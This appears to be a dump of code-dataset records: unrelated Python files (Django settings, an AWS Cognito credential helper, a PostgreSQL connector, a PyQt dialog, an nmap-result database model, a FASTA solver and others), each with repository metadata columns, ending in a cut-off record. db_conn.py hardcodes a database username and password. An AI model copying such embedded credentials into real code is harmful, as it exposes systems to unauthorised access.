# I would like to pass the target url to a notification
#
# Settings for django-tagulous (tagging)
#
SERIALIZATION_MODULES = {
'xml': 'tagulous.serializers.xml_serializer',
'json': 'tagulous.serializers.json',
'python': 'tagulous.serializers.python',
'yaml': 'tagulous.serializers.pyyaml',
}
#
# E-Mail address to contact us
#
CONTACT_EMAIL_ADDRESS = "support@contact.engineering"
#
# Publication settings
#
MIN_SECONDS_BETWEEN_SAME_SURFACE_PUBLICATIONS = 600 # set to None to disable check
CC_LICENSE_INFOS = { # each element refers to two links: (description URL, full license text URL)
'cc0-1.0': {
'description_url': 'https://creativecommons.org/publicdomain/zero/1.0/',
'legal_code_url': 'https://creativecommons.org/publicdomain/zero/1.0/legalcode',
'title': 'CC0 1.0 Universal',
'option_name': 'CC0 1.0 (Public Domain Dedication)'
},
'ccby-4.0': {
'description_url': 'https://creativecommons.org/licenses/by/4.0/',
'legal_code_url': 'https://creativecommons.org/licenses/by/4.0/legalcode',
'title': 'Creative Commons Attribution 4.0 International Public License',
'option_name': 'CC BY 4.0'
},
'ccbysa-4.0': {
'description_url': 'https://creativecommons.org/licenses/by-sa/4.0/',
'legal_code_url': 'https://creativecommons.org/licenses/by-sa/4.0/legalcode',
'title': 'Creative Commons Attribution-ShareAlike 4.0 International Public License',
'option_name': 'CC BY-SA 4.0'
}
}
#
# Settings for exporting plots as thumbnails
#
FIREFOX_BINARY_PATH = env.path('FIREFOX_BINARY_PATH')
GECKODRIVER_PATH = env.path('GECKODRIVER_PATH')
#
# Analysis-specific settings
#
CONTACT_MECHANICS_KWARGS_LIMITS = {
'nsteps': dict(min=1, max=50),
'maxiter': dict(min=1, max=1000),
'pressures': dict(maxlen=50),
}
| 39.837524 | 119 | 0.686735 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15,880 | 0.770986 |
eaba0c23a6f87059f715260269d709b8ed977523 | 166 | py | Python | teste_app/search.py | rafaelang/teste_app | b4e95c9fd373f21ffb39131face077b0499a723d | [
"Apache-2.0"
] | null | null | null | teste_app/search.py | rafaelang/teste_app | b4e95c9fd373f21ffb39131face077b0499a723d | [
"Apache-2.0"
] | null | null | null | teste_app/search.py | rafaelang/teste_app | b4e95c9fd373f21ffb39131face077b0499a723d | [
"Apache-2.0"
] | null | null | null | import requests
from teste_app import settigns
def google(q: str):
"""Faz uma pesquisa no google"""
return requests.get(settigns.GOOGLE, params={"q": q})
| 16.6 | 57 | 0.692771 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 35 | 0.210843 |
eaba24664d5648befbdd4f847264b9c983245bec | 1,275 | py | Python | src/data/prepare_train_data.py | ds-praveenkumar/m5-accuracy-prediction | 20255adc95c3e0fe6c6acec9fd16ac88c6e95908 | [
"MIT"
] | null | null | null | src/data/prepare_train_data.py | ds-praveenkumar/m5-accuracy-prediction | 20255adc95c3e0fe6c6acec9fd16ac88c6e95908 | [
"MIT"
] | null | null | null | src/data/prepare_train_data.py | ds-praveenkumar/m5-accuracy-prediction | 20255adc95c3e0fe6c6acec9fd16ac88c6e95908 | [
"MIT"
] | null | null | null | # github link: https://github.com/ds-praveenkumar/kaggle
# Author: ds-praveenkumar
# file: forcasting/prepare_train_data.py/
# Created by ds-praveenkumar at 13-06-2020 15 34
# feature:
import os
import pandas as pd
import numpy as np
import click
from src.utility.timeit import timeit
root = os.path.dirname(os.getcwd())
train_data_path = os.path.join(root, 'data', 'training')
preprocess_data_path = os.path.join(root, 'data', 'preprocess')
@timeit
def prepare_train_data(prep_path, train_path):
prep_df = pd.DataFrame(np.load(os.path.join(prep_path, 'sales_mat.npy')))
prep_df = prep_df.T
prep_df['ds'] = pd.date_range(end='2016-06-19',periods=1913).values
for column in prep_df.iloc[:,:30489]:
train_items = prep_df[['ds',column]][-365:]
train_items.rename(columns={column:'y'},inplace=True)
save_at = os.path.join(train_path,f"{column}.csv")
train_items.to_csv(save_at,index=False)
print(f"file saved at {save_at}")
@click.command()
@click.argument('preprocess_data_path', type=click.Path(exists=True))
@click.argument('train_data_path', type=click.Path())
def main(preprocess_data_path, train_data_path):
prepare_train_data(preprocess_data_path, train_data_path)
if __name__=='__main__':
main() | 30.357143 | 77 | 0.723137 | 0 | 0 | 0 | 0 | 786 | 0.616471 | 0 | 0 | 342 | 0.268235 |
eabbba5703420267113fe4624cc55ee6b004fe83 | 2,338 | py | Python | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | IoTCognito/get_auth_creds.py | devendersatija/IoTCognito | efa4365a45a13dc6dab6307108d7ccfec0838090 | [
"MIT-0"
] | null | null | null | # Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
# the License. A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
# and limitations under the License.
import boto3
import json
def get_auth_creds(secret_details, cipid):
# Cognito auth
auth_credentials = {}
auth_credentials['region'] = secret_details['region']
auth_credentials['policyname'] = secret_details['policyname']
cognitoIdentityClient = boto3.client(
'cognito-identity',
region_name=secret_details['region'])
cognitoClient = boto3.client(
'cognito-idp',
region_name=secret_details['region'])
response = cognitoClient.initiate_auth(
ClientId=secret_details['clientId'],
AuthFlow='USER_PASSWORD_AUTH',
AuthParameters={
'USERNAME': secret_details['username'],
'PASSWORD': secret_details['password']})
accesstoken = response['AuthenticationResult']['AccessToken']
idtoken = response['AuthenticationResult']['IdToken']
refreshtoken = response['AuthenticationResult']['RefreshToken']
provider_name = 'cognito-idp.' + \
secret_details['region'] + '.amazonaws.com/' + secret_details['userpool']
# Get the users unique identity ID
temporaryIdentityId = cognitoIdentityClient.get_id(
IdentityPoolId=cipid, Logins={provider_name: idtoken})
identityID = temporaryIdentityId["IdentityId"]
# Exchange idtoken for AWS Temporary credentials
temporaryCredentials = cognitoIdentityClient.get_credentials_for_identity(
IdentityId=identityID, Logins={provider_name: idtoken})
auth_credentials['AccessKeyId'] = temporaryCredentials["Credentials"]["AccessKeyId"]
auth_credentials['SecretKey'] = temporaryCredentials["Credentials"]["SecretKey"]
auth_credentials['SessionToken'] = temporaryCredentials["Credentials"]["SessionToken"]
auth_credentials['identityID'] = identityID
return auth_credentials
| 46.76 | 118 | 0.731394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,095 | 0.468349 |
eabbe6584c7141a2b6f0410b24806f7f69f8db70 | 1,041 | py | Python | python/db_conn.py | oerpli/MONitERO | 64f1cc613a8c287a860ab98900f8dec19d506222 | [
"MIT"
] | 2 | 2019-02-09T17:45:48.000Z | 2021-11-09T06:14:23.000Z | python/db_conn.py | oerpli/MONitERO | 64f1cc613a8c287a860ab98900f8dec19d506222 | [
"MIT"
] | null | null | null | python/db_conn.py | oerpli/MONitERO | 64f1cc613a8c287a860ab98900f8dec19d506222 | [
"MIT"
] | 1 | 2018-12-17T20:08:49.000Z | 2018-12-17T20:08:49.000Z | import psycopg2
import psycopg2.extras
import sys
from sqlalchemy import create_engine
import pandas as pd
def get_cursor():
conn_string = "host='localhost' dbname='HintereggerA' user='HintereggerA' password='root'"
# print the connection string we will use to connect
print("Connecting to database: {}".format(conn_string), file=sys.stderr)
# get a connection, if a connect cannot be made an exception will be raised here
conn = psycopg2.connect(conn_string)
# conn.cursor will return a cursor object, you can use this cursor to perform queries
cursor = conn.cursor(cursor_factory=psycopg2.extras.NamedTupleCursor)
# cursor = conn.cursor()
return cursor
def query(query_string):
cursor.execute(query_string)
return cursor.fetchall()
engine = create_engine('postgresql://HintereggerA:root@localhost/HintereggerA')
def pandaquery(query_string):
print("SQL: " + query_string)
return pd.read_sql_query(query_string, engine)
cursor = get_cursor()
# print("DB Cursor is available as cursor")
# print("query with query(str)") | 32.53125 | 91 | 0.775216 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 482 | 0.463016 |
eabc2d16f749bf7011211b6d1f5405973cd4be21 | 243 | py | Python | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | 1 | 2019-06-27T08:45:23.000Z | 2019-06-27T08:45:23.000Z | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | null | null | null | oldplugins/lurk.py | sonicrules1234/sonicbot | 07a22d08bf86ed33dc715a800957aee3b45f3dde | [
"BSD-3-Clause"
] | null | null | null | arguments = ["self", "info", "args"]
helpstring = "lurk"
minlevel = 3
def main(connection, info, args) :
"""Deops and voices the sender"""
connection.rawsend("MODE %s -o+v %s %s\n" % (info["channel"], info["sender"], info["sender"]))
| 30.375 | 98 | 0.617284 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 104 | 0.427984 |
eabe1302de2ccdf32bfec8af5697d4396c658e09 | 6,982 | py | Python | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | null | null | null | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | 1 | 2018-11-06T09:30:23.000Z | 2018-11-06T09:30:23.000Z | volume_editor_layout.py | singleswitch/ticker | 1e793316f2a3252d80339a69672ad81df550875d | [
"MIT"
] | 1 | 2019-01-23T14:46:11.000Z | 2019-01-23T14:46:11.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'volume_layout.ui'
#
# Created: Tue Mar 26 12:40:36 2013
# by: PyQt4 UI code generator 4.7.2
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.resize(522, 285)
self.gridLayout = QtGui.QGridLayout(Dialog)
self.gridLayout.setObjectName("gridLayout")
self.volume_label_0 = QtGui.QLabel(Dialog)
self.volume_label_0.setObjectName("volume_label_0")
self.gridLayout.addWidget(self.volume_label_0, 2, 1, 1, 1)
self.volume_label_1 = QtGui.QLabel(Dialog)
self.volume_label_1.setObjectName("volume_label_1")
self.gridLayout.addWidget(self.volume_label_1, 3, 1, 1, 1)
self.volume_settings_1 = QtGui.QSlider(Dialog)
self.volume_settings_1.setMinimum(1)
self.volume_settings_1.setMaximum(1000)
self.volume_settings_1.setProperty("value", 802)
self.volume_settings_1.setSliderPosition(802)
self.volume_settings_1.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_1.setObjectName("volume_settings_1")
self.gridLayout.addWidget(self.volume_settings_1, 3, 2, 1, 1)
self.volume_label_2 = QtGui.QLabel(Dialog)
self.volume_label_2.setObjectName("volume_label_2")
self.gridLayout.addWidget(self.volume_label_2, 4, 1, 1, 1)
self.volume_settings_2 = QtGui.QSlider(Dialog)
self.volume_settings_2.setMinimum(1)
self.volume_settings_2.setMaximum(1000)
self.volume_settings_2.setProperty("value", 1000)
self.volume_settings_2.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_2.setObjectName("volume_settings_2")
self.gridLayout.addWidget(self.volume_settings_2, 4, 2, 1, 1)
self.volume_label_3 = QtGui.QLabel(Dialog)
self.volume_label_3.setObjectName("volume_label_3")
self.gridLayout.addWidget(self.volume_label_3, 5, 1, 1, 1)
self.volume_settings_3 = QtGui.QSlider(Dialog)
self.volume_settings_3.setMinimum(1)
self.volume_settings_3.setMaximum(1000)
self.volume_settings_3.setProperty("value", 800)
self.volume_settings_3.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_3.setObjectName("volume_settings_3")
self.gridLayout.addWidget(self.volume_settings_3, 5, 2, 1, 1)
self.volume_label_4 = QtGui.QLabel(Dialog)
self.volume_label_4.setObjectName("volume_label_4")
self.gridLayout.addWidget(self.volume_label_4, 6, 1, 1, 1)
self.volume_settings_4 = QtGui.QSlider(Dialog)
self.volume_settings_4.setMinimum(1)
self.volume_settings_4.setMaximum(1000)
self.volume_settings_4.setPageStep(12)
self.volume_settings_4.setProperty("value", 700)
self.volume_settings_4.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_4.setObjectName("volume_settings_4")
self.gridLayout.addWidget(self.volume_settings_4, 6, 2, 1, 1)
self.volume_settings_0 = QtGui.QSlider(Dialog)
self.volume_settings_0.setMinimum(1)
self.volume_settings_0.setMaximum(1000)
self.volume_settings_0.setProperty("value", 702)
self.volume_settings_0.setSliderPosition(702)
self.volume_settings_0.setOrientation(QtCore.Qt.Horizontal)
self.volume_settings_0.setObjectName("volume_settings_0")
self.gridLayout.addWidget(self.volume_settings_0, 2, 2, 1, 1)
self.box_mute_0 = QtGui.QCheckBox(Dialog)
self.box_mute_0.setObjectName("box_mute_0")
self.gridLayout.addWidget(self.box_mute_0, 2, 3, 1, 1)
self.box_mute_1 = QtGui.QCheckBox(Dialog)
self.box_mute_1.setObjectName("box_mute_1")
self.gridLayout.addWidget(self.box_mute_1, 3, 3, 1, 1)
self.box_mute_2 = QtGui.QCheckBox(Dialog)
self.box_mute_2.setObjectName("box_mute_2")
self.gridLayout.addWidget(self.box_mute_2, 4, 3, 1, 1)
self.box_mute_3 = QtGui.QCheckBox(Dialog)
self.box_mute_3.setObjectName("box_mute_3")
self.gridLayout.addWidget(self.box_mute_3, 5, 3, 1, 1)
self.box_mute_4 = QtGui.QCheckBox(Dialog)
self.box_mute_4.setObjectName("box_mute_4")
self.gridLayout.addWidget(self.box_mute_4, 6, 3, 1, 1)
self.box_mute_all = QtGui.QCheckBox(Dialog)
self.box_mute_all.setObjectName("box_mute_all")
self.gridLayout.addWidget(self.box_mute_all, 0, 3, 1, 1)
self.retranslateUi(Dialog)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(QtGui.QApplication.translate("Dialog", "Volume Editor", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_0.setText(QtGui.QApplication.translate("Dialog", "Cheerful Charlie", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_1.setText(QtGui.QApplication.translate("Dialog", "Sad Sandy", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_1.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_2.setText(QtGui.QApplication.translate("Dialog", "Bartitone Bob", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_2.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_3.setText(QtGui.QApplication.translate("Dialog", "Melodic Mary", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_3.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_label_4.setText(QtGui.QApplication.translate("Dialog", "Precise Pete", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_4.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.volume_settings_0.setToolTip(QtGui.QApplication.translate("Dialog", "Adjust the volume of this voice", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_0.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_1.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_2.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_3.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_4.setText(QtGui.QApplication.translate("Dialog", "Mute", None, QtGui.QApplication.UnicodeUTF8))
self.box_mute_all.setText(QtGui.QApplication.translate("Dialog", "Mute all", None, QtGui.QApplication.UnicodeUTF8))
| 62.339286 | 154 | 0.728445 | 6,713 | 0.961472 | 0 | 0 | 0 | 0 | 0 | 0 | 957 | 0.137067 |
eabea33f4d0ec179914a2f9d513c08deb93370e0 | 2,780 | py | Python | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 352 | 2020-01-22T13:36:11.000Z | 2022-03-22T19:37:24.000Z | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 72 | 2020-01-24T04:53:52.000Z | 2021-07-14T19:23:29.000Z | pipeline/models/nmap_model.py | ponderng/recon-pipeline | 11d09902c54969af47731b8e235e447806246004 | [
"MIT"
] | 86 | 2020-01-23T09:20:51.000Z | 2022-03-03T08:04:37.000Z | import textwrap
from sqlalchemy.orm import relationship
from sqlalchemy import Column, Integer, ForeignKey, String, Boolean
from .base_model import Base
from .port_model import Port
from .ip_address_model import IPAddress
from .nse_model import nse_result_association_table
class NmapResult(Base):
""" Database model that describes the TARGET.nmap scan results.
Represents nmap data.
Relationships:
``target``: many to one -> :class:`pipeline.models.target_model.Target`
``ip_address``: one to one -> :class:`pipeline.models.ip_address_model.IPAddress`
``port``: one to one -> :class:`pipeline.models.port_model.Port`
``nse_results``: one to many -> :class:`pipeline.models.nse_model.NSEResult`
"""
def __str__(self):
return self.pretty()
def pretty(self, commandline=False, nse_results=None):
pad = " "
ip_address = self.ip_address.ipv4_address or self.ip_address.ipv6_address
msg = f"{ip_address} - {self.service}\n"
msg += f"{'=' * (len(ip_address) + len(self.service) + 3)}\n\n"
msg += f"{self.port.protocol} port: {self.port.port_number} - {'open' if self.open else 'closed'} - {self.reason}\n"
msg += f"product: {self.product} :: {self.product_version}\n"
msg += "nse script(s) output:\n"
if nse_results is None:
# add all nse scripts
for nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
else:
# filter used, only return those specified
for nse_result in nse_results:
if nse_result in self.nse_results:
msg += f"{pad}{nse_result.script_id}\n"
msg += textwrap.indent(nse_result.script_output, pad * 2)
msg += "\n"
if commandline:
msg += "command used:\n"
msg += f"{pad}{self.commandline}\n"
return msg
__tablename__ = "nmap_result"
id = Column(Integer, primary_key=True)
open = Column(Boolean)
reason = Column(String)
service = Column(String)
product = Column(String)
commandline = Column(String)
product_version = Column(String)
port = relationship(Port)
port_id = Column(Integer, ForeignKey("port.id"))
ip_address = relationship(IPAddress)
ip_address_id = Column(Integer, ForeignKey("ip_address.id"))
target_id = Column(Integer, ForeignKey("target.id"))
target = relationship("Target", back_populates="nmap_results")
nse_results = relationship("NSEResult", secondary=nse_result_association_table, back_populates="nmap_results")
| 35.641026 | 124 | 0.632014 | 2,501 | 0.89964 | 0 | 0 | 0 | 0 | 0 | 0 | 1,030 | 0.370504 |
eac1009e63e90719aaf42106d1bb45371b8deff9 | 697 | py | Python | examples/isinstance.py | quynhanh-ngx/pytago | de976ad8d85702ae665e97978bc4a75d282c857f | [
"MIT"
] | 206 | 2021-06-24T16:16:13.000Z | 2022-03-31T07:44:17.000Z | examples/isinstance.py | quynhanh-ngx/pytago | de976ad8d85702ae665e97978bc4a75d282c857f | [
"MIT"
] | 13 | 2021-06-24T17:51:36.000Z | 2022-02-23T10:07:17.000Z | examples/isinstance.py | quynhanh-ngx/pytago | de976ad8d85702ae665e97978bc4a75d282c857f | [
"MIT"
] | 14 | 2021-06-26T02:19:45.000Z | 2022-03-30T03:02:49.000Z | def main():
a = ["a", 1, "5", 2.3, 1.2j]
some_condition = True
for x in a:
# If it's all isinstance, we can use a type switch
if isinstance(x, (str, float)):
print("String or float!")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!")
print(":)")
# If it's got mixed expressions, we will inline a switch for the isinstance expression
if isinstance(x, str) and some_condition:
print("String")
elif isinstance(x, int):
print("Integer!")
else:
print("Dunno!!")
print(":O")
if __name__ == '__main__':
main()
| 26.807692 | 94 | 0.503587 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 223 | 0.319943 |
eac186c65b17deddeada34c9b520c3aaf6930f53 | 964 | py | Python | sarcsdet/utils/mark_ling_feat.py | castargo/SarcDetectionRusModels | f889879bb29d2a0dc8c2fb8a7ff666de21c241ef | [
"MIT"
] | 1 | 2021-05-07T23:04:59.000Z | 2021-05-07T23:04:59.000Z | sarcsdet/utils/mark_ling_feat.py | castargo/SarcDetectionRusModels | f889879bb29d2a0dc8c2fb8a7ff666de21c241ef | [
"MIT"
] | null | null | null | sarcsdet/utils/mark_ling_feat.py | castargo/SarcDetectionRusModels | f889879bb29d2a0dc8c2fb8a7ff666de21c241ef | [
"MIT"
] | null | null | null | from sarcsdet.configs.ling_feat_config import interjections, funny_marks
def funny_marks_feature(text):
text_set = (str(text)).split()
return sum([text_set.count(x) for x in funny_marks])
def interjections_feature(text):
text_set = (str(text)).split()
return sum([text_set.count(x) for x in interjections])
def get_popular_items(column):
items = dict()
for item_list in column:
if item_list:
for item in item_list:
if item in items.keys():
items[item] += 1
else:
items[item] = 1
top_items = dict(sorted(items.items(), key=lambda item: item[1], reverse=True))
for i, key in enumerate(top_items):
top_items[key] = i + 1
result = []
for item_list in column:
if item_list:
result.append(min([top_items[item] for item in item_list]))
else:
result.append(0)
return result
| 26.054054 | 83 | 0.598548 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
eac30777aababc6bfca5425e5da95cb001f48c9f | 8,887 | py | Python | fastapy/_fasta.py | proloyd/fastapy | 347ee72d98e4a51bd7c5be9cdbf7667ebb45baab | [
"Apache-2.0"
] | 3 | 2018-05-29T08:45:19.000Z | 2021-06-15T00:08:17.000Z | fastapy/_fasta.py | proloyd/fastapy | 347ee72d98e4a51bd7c5be9cdbf7667ebb45baab | [
"Apache-2.0"
] | null | null | null | fastapy/_fasta.py | proloyd/fastapy | 347ee72d98e4a51bd7c5be9cdbf7667ebb45baab | [
"Apache-2.0"
] | 2 | 2021-01-05T11:48:37.000Z | 2021-06-15T00:08:18.000Z | # Author: Proloy Das <proloy@umd.edu>
"""Module implementing the FASTA algorithm"""
import numpy as np
from math import sqrt
from scipy import linalg
import time
import logging
def _next_stepsize(deltax, deltaF, t=0):
"""A variation of spectral descent step-size selection: 'adaptive' BB method.
Reference:
---------
B. Zhou, L. Gao, and Y.H. Dai, 'Gradient methods with adaptive step-sizes,'
Comput. Optim. Appl., vol. 35, pp. 69-86, Sept. 2006
parameters
----------
deltax: ndarray
difference between coefs_current and coefs_next
deltaF: ndarray
difference between grad operator evaluated at coefs_current and coefs_next
returns
-------
float
adaptive step-size
"""
n_deltax = (deltax ** 2).sum() # linalg.norm(deltax, 'fro') ** 2
n_deltaF = (deltaF ** 2).sum() # linalg.norm(deltaF, 'fro') ** 2
innerproduct_xF = np.real((deltax * deltaF).sum())
if n_deltax == 0:
return 0
elif (n_deltaF == 0) | (innerproduct_xF == 0):
return -1
else:
tau_s = n_deltax / innerproduct_xF # steepest descent
tau_m = innerproduct_xF / n_deltaF # minimum residual
# adaptive BB method
if 2 * tau_m > tau_s:
return tau_m
else:
return tau_s - 0.5 * tau_m
def _compute_residual(deltaf, sg):
"""Computes residuals"""
res = sqrt(((deltaf + sg) ** 2).sum())
a = sqrt((deltaf ** 2).sum())
b = sqrt((sg ** 2).sum())
res_r = res / (max(a, b) + 1e-15)
return res, res_r
def _update_coefs(x, tau, gradfx, prox, f, g, beta, fk, linesearch=True):
"""Non-monotone line search
parameters
----------
x: ndarray
current coefficients
tau: float
step size
gradfx: ndarry
gradient operator evaluated at current coefficients
prox: function handle
proximal operator of :math:`g(x)`
f: callable
smooth differentiable function, :math:`f(x)`
g: callable
non-smooth function, :math:`g(x)`
beta: float
backtracking parameter
fk: float
maximum of previous function values
returns
-------
z: ndarray
next coefficients
"""
x_hat = x - tau * gradfx
z = prox(x_hat, tau)
fz = f(z)
count = 0
if linesearch:
while fz > fk + (gradfx * (z - x)).sum() + ((z - x) ** 2).sum() / (2 * tau):
# np.square(linalg.norm(z - x, 'fro')) / (2 * tau):
count += 1
tau *= beta
x_hat = x - tau * gradfx
z = prox(x_hat, tau)
fz = f(z)
sg = (x_hat - z) / tau
return z, fz, sg, tau, count
class Fasta:
r"""Fast adaptive shrinkage/threshold Algorithm
Reference
---------
Goldstein, Tom, Christoph Studer, and Richard Baraniuk. "A field guide to forward-backward
splitting with a FASTA implementation." arXiv preprint arXiv:1411.3406 (2014).
Parameters
----------
f: function handle
smooth differentiable function, :math:`f(x)`
g: function handle
non-smooth convex function, :math:`g(x)`
gradf: function handle
gradient of smooth differentiable function, :math:`\\nabla f(x)`
proxg: function handle
proximal operator of non-smooth convex function
:math:`proxg(v, \\lambda) = argmin g(x) + \\frac{1}{2*\\lambda}\|x-v\|^2`
beta: float, optional
backtracking parameter
default is 0.5
n_iter: int, optional
number of iterations
default is 1000
Attributes
----------
coefs: ndvar
learned coefficients
objective_value: float
optimum objective value
residuals: list
residual values at each iteration
initial_stepsize: float, optional
created only with verbose=1 option
objective: list, optional
objective values at each iteration
created only with verbose=1 option
stepsizes: list, optional
stepsizes at each iteration
created only with verbose=1 option
backtracks: list, optional
number of backtracking steps
created only with verbose=1 option
Notes
-----
Make sure that outputs of gradf and proxg is of same size as x.
The implementation does not check for any such discrepancies.
Use
---
Solve following least square problem using fastapy
:math:`\\min .5||Ax-b||^2 + \\mu*\|x\|_1`
Create function handles
>>> def f(x): return 0.5 * linalg.norm(np.dot(A, x) - b, 2)**2 # f(x) = .5||Ax-b||^2
>>> def gradf(x): return np.dot(A.T, np.dot(A, x) - b) # gradient of f(x)
>>> def g(x): return mu * linalg.norm(x, 1) # mu|x|
>>> def proxg(x, t): return shrink(x, mu*t)
>>> def shrink(x, mu): return np.multiply(np.sign(x), np.maximum(np.abs(x) - mu, 0)) #proxg(z,t) = sign(x)*max(
|x|-mu,0)
Create FASTA instance
>>> lsq = Fasta(f, g, gradf, proxg)
Call solver
>>> lsq.learn(x0, verbose=True)
"""
def __init__(self, f, g, gradf, proxg, beta=0.5, n_iter=1000):
self.f = f
self.g = g
self.grad = gradf
self.prox = proxg
self.beta = beta
self.n_iter = n_iter
self.residuals = []
self._funcValues = []
self.coefs_ = None
def __str__(self):
return "Fast adaptive shrinkage/thresholding Algorithm instance"
def learn(self, coefs_init, tol=1e-4, verbose=True, linesearch=True, next_stepsize=_next_stepsize):
r"""fits the model using FASTA algorithm
parameters
----------
coefs_init: ndarray
initial guess
tol: float, optional
tolerance parameter
default is 1e-8
verbose: bool
verbosity of the method : 1 will display informations while 0 will display nothing
default = 0
linesearch: bool
if True (Default) uses line-search to fine step-size
next_stepsize: callable
a callable with argument (\deltax, \deltaGradf) which provides next step-size.
Default is a non-monotone step-size selection ('adaptive' BB) method.
returns
-------
self
"""
logger = logging.getLogger("FASTA")
coefs_current = np.copy(coefs_init)
grad_current = self.grad(coefs_current)
coefs_next = coefs_current + 0.01 * np.random.randn(coefs_current.shape[0], coefs_current.shape[1])
grad_next = self.grad(coefs_next)
tau_current = next_stepsize(coefs_next - coefs_current, grad_next - grad_current, 0)
self._funcValues.append(self.f(coefs_current))
if verbose:
self.objective = []
self.objective.append(self._funcValues[-1] + self.g(coefs_current))
self.initial_stepsize = np.copy(tau_current)
self.stepsizes = []
self.backtracks = []
start = time.time()
logger.debug(f"Iteration \t objective value \t step-size \t backtracking steps taken \t residual")
for i in range(self.n_iter):
coefs_next, objective_next, sub_grad, tau, n_backtracks \
= _update_coefs(coefs_current, tau_current, grad_current,
self.prox, self.f, self.g, self.beta, max(self._funcValues), linesearch)
self._funcValues.append(objective_next)
grad_next = self.grad(coefs_next)
# Find residual
delta_coef = coefs_current - coefs_next
delta_grad = grad_current - grad_next
residual, residual_r = _compute_residual(grad_next, sub_grad)
self.residuals.append(residual)
residual_n = residual / (self.residuals[0] + 1e-15)
# Find step size for next iteration
tau_next = next_stepsize(delta_coef, delta_grad, i)
if verbose:
self.stepsizes.append(tau)
self.backtracks.append(n_backtracks)
self.objective.append(objective_next + self.g(coefs_next))
logger.debug(
f"{i} \t {self.objective[i]} \t {self.stepsizes[i]} \t {self.backtracks[i]} \t {self.residuals[i]}")
# Prepare for next iteration
coefs_current = coefs_next
grad_current = grad_next
if tau_next == 0.0 or min(residual_n, residual_r) < tol: # convergence reached
break
elif tau_next < 0.0: # non-convex probelms -> negative stepsize -> use the previous value
tau_current = tau
else:
tau_current = tau_next
end = time.time()
self.coefs_ = coefs_current
self.objective_value = objective_next + self.g(coefs_current)
if verbose:
logger.debug(f"total time elapsed : {end - start}s")
return self
| 33.160448 | 120 | 0.590976 | 6,203 | 0.697986 | 0 | 0 | 0 | 0 | 0 | 0 | 4,872 | 0.548216 |
eac399423be5d4d4f542d0d58d41f6e21f9aff4b | 607 | py | Python | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 45 | 2020-01-18T03:46:07.000Z | 2022-03-26T13:06:36.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
] | 1 | 2020-08-16T12:42:05.000Z | 2020-08-16T12:42:05.000Z | pycorrector/utils/io_utils.py | zouning68/pycorrector | 4daaf13e566f2cecc724fb5a77db5d89f1f25203 | [
"Apache-2.0"
